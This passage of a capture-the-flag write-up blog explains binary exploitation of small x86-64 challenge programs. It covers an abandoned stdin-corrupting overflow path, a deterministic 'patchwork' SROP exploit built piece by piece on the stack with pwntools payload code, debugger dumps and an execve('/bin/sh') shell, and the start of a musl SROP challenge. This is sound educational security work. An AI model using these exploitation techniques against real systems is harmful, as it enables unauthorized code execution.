[ #1] 0x7f99c6bf06ad <__syscall_cancel+0xd>
[ #2] 0x7f99c6c64ea6 <read+0x16> (frame name: __GI___libc_read)
[ #3] 0x7f99c6beb861 <__GI__IO_file_underflow+0x151> (frame name: _IO_new_file_underflow)
[ #4] 0x7f99c6bedbeb <_IO_default_uflow+0x2b> (frame name: __GI__IO_default_uflow)
[ #5] 0x7f99c6be08ca <_IO_getline_info+0xaa> (frame name: __GI__IO_getline_info)
[ #6] 0x7f99c6be09c8 <NO_SYMBOL>
[ #7] 0x7f99c6bdf70a <fgets+0x9a> (frame name: _IO_fgets)
[ #8] 0x0000004014b7 <main+0xc4>
[ #9] 0x000000000000 <NO_SYMBOL>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
gef> 
We can see our backtrace, as well as the stack frames of our nested calls. Look at all our helper functions, __IO_default_uflow_, _IO_getline_info, all with their own stack frames. Our write will eventually collide with these frames.
----------------------------------------------
gef> frame 3
#3  0x00007f99c6beb861 in _IO_new_file_underflow (fp=0x7f99c6d488e0 <_IO_2_1_stdin_>) at ./libio/libioP.h:1041
⚠️ warning: 1041	./libio/libioP.h: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e20|+0x0000|+000: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
0x000000404e28|+0x0008|+001: 0x00007f99c6d46fd0 <_IO_file_jumps>  ->  0x0000000000000000  <-  $rbp
0x000000404e30|+0x0010|+002: 0x000000000000000a
0x000000404e38|+0x0018|+003: 0x0000000039f41f71  ->  0x2800000000000000  <-  $r13
0x000000404e40|+0x0020|+004: 0x000000000000014f
0x000000404e48|+0x0028|+005: 0x00007f99c6bedbeb <_IO_default_uflow+0x2b>  ->  0x438b480f74fff883  <-  retaddr[4
] ($savedip)
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> frame 4
#4  0x00007f99c6bedbeb in __GI__IO_default_uflow (fp=0x7f99c6d488e0 <_IO_2_1_stdin_>) at ./libio/libioP.h:1041
⚠️ warning: 1041	./libio/libioP.h: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e50|+0x0000|+000: 0x4343434343434343 'CCCCCCCC'
0x000000404e58|+0x0008|+001: 0x0000000000000000
0x000000404e60|+0x0010|+002: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404e68|+0x0018|+003: 0x00007f99c6be08ca <_IO_getline_info+0xaa>  ->  0x000090840ffff883  <-  retaddr[5]
 ($savedip)
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> frame 5
#5  0x00007f99c6be08ca in __GI__IO_getline_info (fp=fp@entry=0x7f99c6d488e0 <_IO_2_1_stdin_>,
    buf=buf@entry=0x404e70 "CCCCCCCCpN@", n=0x14f, delim=delim@entry=0xa,
    extract_delim=extract_delim@entry=0x1, eof=eof@entry=0x0) at ./libio/iogetline.c:60
⚠️ warning: 60	./libio/iogetline.c: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e70|+0x0000|+000: 0x4343434343434343 'CCCCCCCCpN@'
0x000000404e78|+0x0008|+001: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404e80|+0x0010|+002: 0x0000000143434343
0x000000404e88|+0x0018|+003: 0x0000000000000000
0x000000404e90|+0x0020|+004: 0x4343434343434343
0x000000404e98|+0x0028|+005: 0x00007fff4c79a648  ->  0x00007fff4c79ae9a  ->  0x72772f656d6f682f '/home/wrenches
/work/pwn/ret2what/chall_patched'
0x000000404ea0|+0x0030|+006: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
0x000000404ea8|+0x0038|+007: 0x0000000000000000
0x000000404eb0|+0x0040|+008: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404eb8|+0x0048|+009: 0x00007f99c6dc5000 <_rtld_global>  ->  0x00007f99c6dc6310  ->  0x0000000000000000
0x000000404ec0|+0x0050|+010: 0x0000000000403df0 <__do_global_dtors_aux_fini_array_entry>  ->  0x000000000040119
0 <__do_global_dtors_aux>  ->  0x2f0d3d80fa1e0ff3
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> 
And carefully, carefully, after our write finishes, we can see that the stack frame of _IO_getline_info is overwritten. We're at the function prologue's pop chain, with the stack placed over a bountiful field of 0x414141s.
---------------------------------------------------------------------------------------------- stack ----
$rsp  0x000000404e98|+0x0000|+000: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ea0|+0x0008|+001: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ea8|+0x0010|+002: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404eb0|+0x0018|+003: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404eb8|+0x0020|+004: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ec0|+0x0028|+005: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ec8|+0x0030|+006: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ed0|+0x0038|+007: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
-------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f0f526f294c 498d041c              <_IO_getline_info+0x12c>   lea    rax, [r12+rbx*1]
    0x7f0f526f2950 4d894708              <_IO_getline_info+0x130>   mov    QWORD PTR [r15+0x8], r8
    0x7f0f526f2954 4883c428              <_IO_getline_info+0x134>   add    rsp, 0x28
 -> 0x7f0f526f2958 5b                    <_IO_getline_info+0x138>   pop    rbx
    0x7f0f526f2959 5d                    <_IO_getline_info+0x139>   pop    rbp
    0x7f0f526f295a 415c                  <_IO_getline_info+0x13a>   pop    r12
    0x7f0f526f295c 415d                  <_IO_getline_info+0x13c>   pop    r13
    0x7f0f526f295e 415e                  <_IO_getline_info+0x13e>   pop    r14
    0x7f0f526f2960 415f                  <_IO_getline_info+0x140>   pop    r15
-------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1457669] Name: "chall_patched", stopped at 0x7f0f526f2958 <_IO_getline_info+0x138>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f0f526f2958 <_IO_getline_info+0x138> (frame name: __GI__IO_getline_info)
[ #1] 0x4141414141414141 <NO_SYMBOL>
[ #2] 0x4141414141414141 <NO_SYMBOL>
[ #3] 0x4141414141414141 <NO_SYMBOL>
[ #4] 0x4141414141414141 <NO_SYMBOL>
[ #5] 0x4141414141414141 <NO_SYMBOL>
[ #6] 0x4141414141414141 <NO_SYMBOL>
[ #7] 0x4141414141414141 <NO_SYMBOL>
[ #8] 0x4141414141414141 <NO_SYMBOL>
[ #9] 0x4141414141414141 <NO_SYMBOL>
[...]
---------------------------------------------------------------------------------------------------------
gef> 
On its surface, this seems like a great way to get register control easily without having to worry about libc gadget spraying. The issue with this is that this challenge requires more calls to fgets down the line once we mprotect and call our shellcode, and by corrupting the execution of _IO_getline_info, we irreversibly corrupt stdin in a way that prevents us from further calling fgets(). If all we needed was rbx control for a one-gadget, this would fully work! (And indeed, there may or may not be a Dreamhack level 8 which leverages this strategy, haha...).
gef> p *stdin
$7 = {
  _flags = 0xfbad2088,
  _IO_read_ptr = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
  _IO_read_end = 0x2efedf51 'C' <repeats 15 times>, "\200O@",
  _IO_read_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_ptr = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_end = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_buf_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_buf_end = 0x2efeee50 "",
  _IO_save_base = 0x0,
  _IO_backup_base = 0x0,
  _IO_save_end = 0x0,
  _markers = 0x0,
  _chain = 0x0,
  _fileno = 0x0,
  _flags2 = 0x0,
  _short_backupbuf = "",
  _old_offset = 0xffffffffffffffff,
  _cur_column = 0x0,
  _vtable_offset = 0x0,
  _shortbuf = "",
  _lock = 0x7f0f5285c7c0 <_IO_stdfile_0_lock>,
  _offset = 0xffffffffffffffff,
  _codecvt = 0x0,
  _wide_data = 0x7f0f5285a9c0 <_IO_wide_data_0>,
  _freeres_list = 0x0,
  _freeres_buf = 0x0,
  _prevchain = 0x7f0f5285b628 <_IO_2_1_stdout_+104>,
  _mode = 0xffffffff,
  _unused2 = '\000' <repeats 19 times>
}
gef> 
Note the state of this stdin file struct. When fgets is further called, it just completely refuses to take any more data, rendering this exploit path utterly useless. :( Perhaps there is some way to not corrupt _IO_read_ptr, or overwrite it with a nice value? I am unfortunately not an FSOP expert.

Enough of that diversion. Onto Pain Cube number two.

lnc26: mixed signals by ndgsghdj

tldr if you hate me and want me to die - build srop frame piece by piece on the stack by using ret2start to shift stack frame upwards and retslides to shift stack frame downwards, deterministic
0000000000400450 <main>:
  400450:	55                   	push   rbp
  400451:	48 89 e5             	mov    rbp,rsp
  400454:	48 8d 4d e0          	lea    rcx,[rbp-0x20]
  400458:	b8 00 00 00 00       	mov    eax,0x0
  40045d:	bf 00 00 00 00       	mov    edi,0x0
  400462:	48 89 ce             	mov    rsi,rcx
  400465:	ba 80 00 00 00       	mov    edx,0x80
  40046a:	0f 05                	syscall
  40046c:	5d                   	pop    rbp
  40046d:	c3                   	ret
Another very simple piece of code. rbp relative buffer, read syscall to overflow, standard. When we see an exposed syscall instruction in our binary the first thought should be very natural - SROP. Note that SROP requires more than 0x80 bytes of write, however.

The difficulty in this challenge is that it was written without a single leave gadget in the binary. We do not have rsp control and cannot pivot out into a region of memory with a known address. Typically, for an SROP challenge with a limited size write, we can write the SROP frame in bits and pieces onto a known address somewhere in .bss after pivoting our stack there. We have no such luck here.

The intended solution is to spray and pray a 1/16 partial overwrite to get a leave ; ret gadget somewhere in libc, but I ended up finding a nice deterministic solution. The solution involves a lot of stack feng shui, so for this challenge we temporarily forgo our Catholic roots and turn to Buddhism for guidance and protection. Hopefully this is acceptable and will not send me to Super Hell.

Essentially, we want to write our frame on the stack instead. The way we do this is by slowly moving upwards and downwards within stack space, ensuring that our writes are just perfectly aligned to build a contiguous SROP frame, including the address to our syscall gadget just above. We imagine ourselves as a crane operator - we don't know how high up in the air we are, but we know where the foundation of our building is relative to ourselves. If we can carefully maneuver our hook up and down, we can slowly construct the building bit by bit.

We therefore require two 'stack control' primitives - a way to move downwards, and a way to move upwards. The first one is considerably easier - we have an add rsp, 0x8 gadget within the binary.
-------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x40034b 4885c0                <_init+0xf>   test   rax, rax
    0x40034e 7402                  <_init+0x12>   je     0x400352 <_init+22>
    0x400350 ffd0                  <_init+0x14>   call   rax
 -> 0x400352 4883c408              <_init+0x16>   add    rsp, 0x8
    0x400356 c3                    <_init+0x1a>   ret   
    0x400357 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x400359 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x40035b 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x40035d 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
-------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1509462] Name: "main", stopped at 0x000000400352 <_init+0x16>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------- trace ----
[*#0] 0x000000400352 <_init+0x16>
[ #1] 0x000000400450 <main> (frame name: frame_dummy)
[ #2] 0x00337fa49f30 <NO_SYMBOL>
[ #3] 0x000000400450 <main> (frame name: frame_dummy)
[ #4] 0x000000000000 <NO_SYMBOL>
---------------------------------------------------------------------------------------------------------
gef> 
This gadget will allow us to move downwards. In fact, it gives us quite fine-grained control - we can move downwards in 0x10 increments. Even if we do not have super specific control over our upwards movement, as long as we can move upwards _any_ sufficiently large amount, we can chain add rsps to eventually shift ourselves downwards. Consider this as a sort of correcting factor.

This 'upwards' gadget is, conversely, significantly harder to find. There is no direct sub rsp, ... gadget in our binary (not any useful ones, anyway).
0000000000400470 <_fini>:
  400470:	f3 0f 1e fa          	endbr64
  400474:	48 83 ec 08          	sub    rsp,0x8
  400478:	48 83 c4 08          	add    rsp,0x8
  40047c:	c3                   	ret

(base) wrenches@kitty (~/work/pwn/signals) > objdump -d main -M intel --disassembler-color=on | grep rsp
  400340:	48 83 ec 08          	sub    rsp,0x8
  400352:	48 83 c4 08          	add    rsp,0x8
  40036a:	48 89 e2             	mov    rdx,rsp
  40036d:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
  400372:	54                   	push   rsp
  40041e:	48 89 e5             	mov    rbp,rsp
  400451:	48 89 e5             	mov    rbp,rsp
  400474:	48 83 ec 08          	sub    rsp,0x8
  400478:	48 83 c4 08          	add    rsp,0x8
The answer lies in the very start of the binary, specifically, the initialisation functions called when the process is just starting up, in _start.
0000000000400360 <_start>:
  400360:	f3 0f 1e fa          	endbr64
  400364:	31 ed                	xor    ebp,ebp
  400366:	49 89 d1             	mov    r9,rdx
  400369:	5e                   	pop    rsi
  40036a:	48 89 e2             	mov    rdx,rsp
  40036d:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
  400371:	50                   	push   rax
  400372:	54                   	push   rsp
  400373:	45 31 c0             	xor    r8d,r8d
  400376:	31 c9                	xor    ecx,ecx
  400378:	48 c7 c7 50 04 40 00 	mov    rdi,0x400450
  40037f:	ff 15 53 2c 00 00    	call   QWORD PTR [rip+0x2c53]        # 402fd8 <__libc_start_main@GLIBC_2.34>
  400385:	f4                   	hlt
  400386:	66 2e 0f 1f 84 00 00 	cs nop WORD PTR [rax+rax*1+0x0]
  40038d:	00 00 00
_start() calls __libc_start_main, which eventually calls _libc_start_call_main. This function allocates 0x90 bytes of stack space.
----------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f32b73224ff 90                    <NO_SYMBOL>   nop
    0x7f32b7322500 55                    <__libc_start_call_main>   push   rbp
    0x7f32b7322501 4889e5                <__libc_start_call_main+0x1>   mov    rbp, rsp
 -> 0x7f32b7322504 4881ec90000000        <__libc_start_call_main+0x4>   sub    rsp, 0x90
    0x7f32b732250b 48897d88              <__libc_start_call_main+0xb>   mov    QWORD PTR [rbp - 0x78], rdi
    0x7f32b732250f 897584                <__libc_start_call_main+0xf>   mov    DWORD PTR [rbp - 0x7c], esi
    0x7f32b7322512 48899578ffffff        <__libc_start_call_main+0x12>   mov    QWORD PTR [rbp - 0x88], rdx
    0x7f32b7322519 64488b3c2528000000    <__libc_start_call_main+0x19>   mov    rdi, QWORD PTR fs:0x28
    0x7f32b7322522 48897df8              <__libc_start_call_main+0x22>   mov    QWORD PTR [rbp - 0x8], rdi
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1512782] Name: "main", stopped at 0x7f32b7322504 <__libc_start_call_main+0x4>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f32b7322504 <__libc_start_call_main+0x4>
[ #1] 0x7f32b7322628 <__libc_start_main_impl+0x88>
[ #2] 0x000000400385 <_start+0x25>
------------------------------------------------------------------------------------------------------------------------------
After it allocates this stack space, it eventually goes back into our main function. Note that when the main function is called, this stack space is still allocated. __libc_start_call_main is not finished, so the function epilogue does not reset the stack frame.
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f2810a5555e 488b05434a1e00        <__libc_start_call_main+0x5e>   mov    rax, QWORD PTR [rip+0x1e4a43] # 0x7f2810c39fa8
    0x7f2810a55565 488bb578ffffff        <__libc_start_call_main+0x65>   mov    rsi, QWORD PTR [rbp-0x88]
    0x7f2810a5556c 8b7d84                <__libc_start_call_main+0x6c>   mov    edi, DWORD PTR [rbp-0x7c]
 -> 0x7f2810a5556f 488b10                <__libc_start_call_main+0x6f>   mov    rdx, QWORD PTR [rax]
    0x7f2810a55572 ff5588                <__libc_start_call_main+0x72>   call   QWORD PTR [rbp - 0x78] <main>
    0x7f2810a55575 89c7                  <__libc_start_call_main+0x75>   mov    edi, eax
    0x7f2810a55577 e864930100            <__libc_start_call_main+0x77>   call   0x7f2810a6e8e0 <exit>
    0x7f2810a5557c e8dfbd0600            <__libc_start_call_main+0x7c>   call   0x7f2810ac1360 <__nptl_deallocate_tsd>
    0x7f2810a55581 f0832d474b1e0001      <__libc_start_call_main+0x81>   lock   sub DWORD PTR [rip + 0x1e4b47], 0x1 # 0x7f2810c3a0d0 <_
_nptl_nthreads>
--------------------------------------------------------------------------------------------- memory access: $rax = 0x7f2810c41e28 ----
$rax  0x7f2810c41e28|+0x0000|+000: 0x00007fffc5df7ce8  ->  0x00007fffc5df8ed4  ->  0x504d554a4f545541 'AUTOJUMP_ERROR_PATH=/home/wrench
es/.local/share/autojump/errors.[...]'
      0x7f2810c41e30|+0x0008|+001: 0x0000000000000000
      0x7f2810c41e38|+0x0010|+002: 0x0000000000000000
      0x7f2810c41e40|+0x0018|+003: 0x0000000000000000
And of course, once we are back in main(), we get our overflow primitive again. This time, however, we have successfully moved upwards on the stack.

From here on out, the challenge just becomes an exercise in configuring offsets. We slide upwards, then slide downwards just enough to touch the base of our built SROP frame, write our SROP frame, then do it all over again. This is frankly, agonizing, but it's okay.
   36   payload += p64(elf.sym['_start'])
   35   payload += struct.pack("<H", 0x33)       # rt_sigframe.uc.uc_mcontext.cs
   34   payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.gs
   33   payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.fs
   32   payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.__pad0
   31   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.err
   30   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.trapno
   29   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.oldmask
   28   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.cr2
   27   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.fpstate # fpu/xmm are not restored if NULL
   26   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.reserved[8]
   25   payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_sigmask
   24   payload += struct.pack("<Q", 0x0)        # rt_sigframe.info
   23   payload += p64(0xcacacacacacacaca)
   22   print('[!] sliding up...')
   21   p.send(payload)
   20   
   19   print('[!] sliding down...')
   18   for i in range(1, 10):
   17   │   payload = b'A' * 0x28
   16   │   payload += p64(ADD) + p64(0)
   15   │   payload += p64(elf.sym['main'])
   14   │   time.sleep(0.1)
   13   │   p.send(payload)
   12   
   11   print('[!] writing second section of srop frame')
   10   payload = b'A' * 0x28
    9   payload += p64(elf.sym['_start'])
    8   payload += struct.pack("<Q", 0x02)       # rt_sigframe.uc.uc_mcontext.rbx
    7   payload += struct.pack("<Q", 0x0)       # rt_sigframe.uc.uc_mcontext.rdx
    6   payload += struct.pack("<Q", 59)       # rt_sigframe.uc.uc_mcontext.rax
    5   payload += struct.pack("<Q", 0x03)       # rt_sigframe.uc.uc_mcontext.rcx
    4   payload += struct.pack("<Q", 0x4031e0) # rt_sigframe.uc.uc_mcontext.rsp
    3   payload += struct.pack("<Q", SYSCALL) # rt_sigframe.uc.uc_mcontext.rip
    2   payload += p64(0)
We must, however, answer two more questions: the first one being where to place /bin/sh, and the second one being rax control. We can actually answer both of these questions at once.

Given that the binary uses the read syscall, rax is set to the number of bytes read. We can simply move rbp to an area in .bss and then read exactly 0xf bytes (the funny sigreturn syscall number), part of which is /bin/sh. This does require a bit more stack feng shui - given that our 0xf read must necessarily not overwrite the return address of our read call, we must prepare the necessary return address to syscall beforehand. We must also note that at this juncture, we need to be positioned above our syscall gadget, as well as the SROP frame we have been patiently constructing.

This layout will look somewhat like this. We first return to one read call (in the middle of main), one random stored rbp value (because our program ends up hitting a leave ; ret), and our syscall gadget, which is directly followed by the SROP frame.
gef> x/16g $rsp
0x7fff1ca4d020:	0x0000000000400454	0x000000000040046d
0x7fff1ca4d030:	0x000000000040046a	0x00007fff1ca4d218
0x7fff1ca4d040:	0x4141414141414141	0x0000000000000000
0x7fff1ca4d050:	0x00007fff1ca4d0c0	0x0000000000000002
0x7fff1ca4d060:	0x00007f07e32a1000	0x0000000000402e40
0x7fff1ca4d070:	0x0000000000000000	0x0000000000400385
0x7fff1ca4d080:	0x00007fff1ca4d088	0x0000000000000068
0x7fff1ca4d090:	0x4141414141414141	0x4141414141414141
gef> x/i 0x00000040046a
   0x40046a <main+26>:	syscall
gef> x/i 0x00000040046d
=> 0x40046d <main+29>:	ret
gef> x/i 0x000000400454
   0x400454 <main+4>:	lea    rcx,[rbp-0x20]
The program flow will then complete the read, pop rbp, and then ret to our syscall gadget.
--------------------------------------------------------------------------------------------------------------- arguments ----
[+] Detected syscall (arch:X86, mode:64)
    rt_sigreturn()
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0xf
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1533937] Name: "main", stopped at 0x00000040046a <main+0x1a>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x00000040046a <main+0x1a>
[ #1] 0xc308c4834808ec83 <NO_SYMBOL>
[ #2] 0x000000000000 <NO_SYMBOL>
------------------------------------------------------------------------------------------------------------------------------
gef> x/32g $rsp
0x7fff1ca4d038:	0x00007fff1ca4d218	0x4141414141414141
0x7fff1ca4d048:	0x0000000000000000	0x00007fff1ca4d0c0
0x7fff1ca4d058:	0x0000000000000002	0x00007f07e32a1000
0x7fff1ca4d068:	0x0000000000402e40	0x0000000000000000
0x7fff1ca4d078:	0x0000000000400385	0x00007fff1ca4d088
0x7fff1ca4d088:	0x0000000000000068	0x4141414141414141
0x7fff1ca4d098:	0x4141414141414141	0x00000000004031e0
0x7fff1ca4d0a8:	0x0000000000000000	0x0000000000000005
0x7fff1ca4d0b8:	0x0000000000000002	0x0000000000000000
0x7fff1ca4d0c8:	0x000000000000003b	0x0000000000000003
0x7fff1ca4d0d8:	0x00000000004031e0	0x000000000040046a
Interestingly, note that the SROP frame _does_ end up having some garbage values. The SROP frame does not need to be perfect, as some of the fields will go into unused registers.
0x7fff1ca4d038|+0x0000|+000: rt_sigframe.pretcode                      : 0x00007fff1ca4d218  ->  0x00007fff1ca4ded4  ->  0x504
d554a4f545541 'AUTOJUMP_ERROR_PATH=/home/wrenches/.local/share/autojump/errors.[...]'
0x7fff1ca4d040|+0x0008|+001: rt_sigframe.uc.uc_flags                   : 0x4141414141414141 'AAAAAAAA'
0x7fff1ca4d048|+0x0010|+002: rt_sigframe.uc.uc_link                    : 0x0000000000000000
0x7fff1ca4d050|+0x0018|+003: rt_sigframe.uc.uc_stack.ss_sp             : 0x00007fff1ca4d0c0  ->  0x0000000000000000
0x7fff1ca4d058|+0x0020|+004: rt_sigframe.uc.uc_stack.ss_flags|ss_size  : 0x0000000000000002
0x7fff1ca4d060|+0x0028|+005: rt_sigframe.uc.uc_mcontext.r8             : 0x00007f07e32a1000 <_rtld_local>  ->  0x00007f07e32a2
5f0  ->  0x0000000000000000  <-  $r14
0x7fff1ca4d068|+0x0030|+006: rt_sigframe.uc.uc_mcontext.r9             : 0x0000000000402e40 <__do_global_dtors_aux_fini_array_
entry>  ->  0x0000000000400410 <__do_global_dtors_aux>  ->  0x2be93d80fa1e0ff3  <-  $r15
0x7fff1ca4d070|+0x0038|+007: rt_sigframe.uc.uc_mcontext.r10            : 0x0000000000000000
0x7fff1ca4d078|+0x0040|+008: rt_sigframe.uc.uc_mcontext.r11            : 0x0000000000400385 <_start+0x25>  ->  0x0000841f0f2e6
6f4
0x7fff1ca4d080|+0x0048|+009: rt_sigframe.uc.uc_mcontext.r12            : 0x00007fff1ca4d088  ->  0x0000000000000068
0x7fff1ca4d088|+0x0050|+010: rt_sigframe.uc.uc_mcontext.r13            : 0x0000000000000068
0x7fff1ca4d090|+0x0058|+011: rt_sigframe.uc.uc_mcontext.r14            : 0x4141414141414141
0x7fff1ca4d098|+0x0060|+012: rt_sigframe.uc.uc_mcontext.r15            : 0x4141414141414141
0x7fff1ca4d0a0|+0x0068|+013: rt_sigframe.uc.uc_mcontext.rdi            : 0x00000000004031e0  ->  0x0068732f6e69622f ('/bin/sh'
?)  <-  $rsi
0x7fff1ca4d0a8|+0x0070|+014: rt_sigframe.uc.uc_mcontext.rsi            : 0x0000000000000000
0x7fff1ca4d0b0|+0x0078|+015: rt_sigframe.uc.uc_mcontext.rbp            : 0x0000000000000005
0x7fff1ca4d0b8|+0x0080|+016: rt_sigframe.uc.uc_mcontext.rbx            : 0x0000000000000002
0x7fff1ca4d0c0|+0x0088|+017: rt_sigframe.uc.uc_mcontext.rdx            : 0x0000000000000000
0x7fff1ca4d0c8|+0x0090|+018: rt_sigframe.uc.uc_mcontext.rax            : 0x000000000000003b
0x7fff1ca4d0d0|+0x0098|+019: rt_sigframe.uc.uc_mcontext.rcx            : 0x0000000000000003
Anyways, after this our SROP ends up succeeding and we get a shell. Yay!
    0x40045d bf00000000            <main+0xd>   mov    edi, 0x0
    0x400462 4889ce                <main+0x12>   mov    rsi, rcx
    0x400465 ba80000000            <main+0x15>   mov    edx, 0x80
 -> 0x40046a 0f05                  <main+0x1a>   syscall
    0x40046c 5d                    <main+0x1c>   pop    rbp
    0x40046d c3                    <main+0x1d>   ret
    0x40046e 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x400470 f30f1efa              <_fini>   endbr64
    0x400474 4883ec08              <_fini+0x4>   sub    rsp, 0x8
--------------------------------------------------------------------------------------------------------------- arguments ----
[+] Detected syscall (arch:X86, mode:64)
    execve(const char __user *filename, const char __user *const __user *argv, const char __user *const __user *envp)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x3b
    filename             $rdi                 0x00000000004031e0  ->  0x0068732f6e69622f ('/bin/sh'?)
    argv                 $rsi                 0x0000000000000000
    envp                 $rdx                 0x0000000000000000
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1533937] Name: "main", stopped at 0x00000040046a <main+0x1a>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x00000040046a <main+0x1a>
------------------------------------------------------------------------------------------------------------------------------
gef> 

closing thoughts

Good challenge! There are a lot of interesting things you can do with building SROP frames piece by piece, due to the fact that (as mentioned above) SROP frames do not need to be completely free of junk. Even if your writes are weak and litter the space with garbage pointers, with enough care and precision you can, indeed, carefully position that junk to whack irrelevant register values instead.

I would love to talk more about these sorts of techniques (I call this sort of shit 'patchwork SROP' but there is no way it is novel), but unfortunately, the challenges I've been able to use them in are embargoed, either by my own doing (I'd like to be able to use them in some event that hasn't happened yet) or someone else's (like, not being able to publish Dreamhack solutions).

A lot of interesting stuff can be seen here. Shoutout to the Netherlands for inventing SROP. It really can do everything.

lnc26 - overly simplified pwn challenge v2 (by me)

tldr musl pwn. partial overwrite to syscall gad
   9   #include <stdio.h>
   8   #include <unistd.h>
   7   
   6   int main(void) {
   5   char buf[0x50];
   4   read(0, buf, 0x1000);
   3   return 0;
   2   }
The version of this challenge used for the competition proper had a few extra gadgets given in the form of a gift function. Personally, I have improved in stack pwn over the past two months since this challenge was written, and I wondered whether or not it was possible without the added gadgets (which were a pop rbx and a mov rax , rdx) gadget. Turns out, yes! Quite easily, actually, took me around an hour.

Anyways very standard. 0x1000 (wow, generous) byte write into an 0x50 buffer. The key contrivance of this challenge is that it's hosted on alpine and therefore compiled for musl. It turns out that this change does not really do much of anything, other than add some ragebait later down the line and also provide a helpful pop rax gadget.
wrenches@kitty (mplified-pwn-challenge-v2) > ROPgadget --binary=main --nojop | grep pop
0x000000000040111c : add byte ptr [rcx], al ; pop rbp ; ret
0x0000000000401117 : mov byte ptr [rip + 0x2f02], 1 ; pop rbp ; ret
0x0000000000401001 : pop rax ; ret
0x000000000040111e : pop rbp ; ret
Anyways, the solution is also SROP for this challenge. We don't have any syscall gadgets in the binary, but using the same trick from earlier (leaving libc pointers on the stack through I/O func calls), we see that two specific libc pointers are given to us.
[+] Searching for addresses in 'main' that point to 'ld'
main_patched: 0x0000000000403fd0 <read@got[plt]>  ->  0x00007f9545bdf480 <read>  ->  0x48f0894810ec8348
main_patched: 0x0000000000403fd8 <__libc_start_main@got.plt>  ->  0x00007f9545bb649d <__libc_start_main>  ->  0xfc8949c663485441
